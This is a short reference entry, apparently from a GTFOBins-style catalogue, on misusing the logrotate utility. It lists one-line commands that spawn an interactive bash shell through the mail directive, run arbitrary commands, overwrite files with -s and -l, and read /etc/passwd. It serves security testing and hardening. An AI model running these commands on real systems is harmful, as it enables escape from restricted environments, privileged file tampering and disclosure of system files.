Logrotate is used to rotate stale logs and perform various actions like compress the old ones, send mails, and so on. More information about exploiting logrotate may be found here.
It can be used to break out from restricted environments by spawning an interactive system shell.
Requires a logrotate policy which uses the mail directive.
logrotate -m "/usr/bin/bash -i #" -v -f logrotate.policyIt can be used to break out from the intended program by running non-interactive system commands.
Requires a logrotate policy which uses the mail directive. A hash should be used as the final character in the command, as it is run with a few arguments.
logrotate -m "/usr/bin/id &> /tmp/output #" -v -f logrotate.policyIt writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
Creates or overwrites the file with the exact text logrotate state -- version 2
logrotate -s /tmp/file logrotate.policyCreates or overwrites the file with junk data in combination with arbitrary data.
logrotate -l /tmp/file helloworldIt reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
Reads the first ‘word’.
logrotate /etc/passwd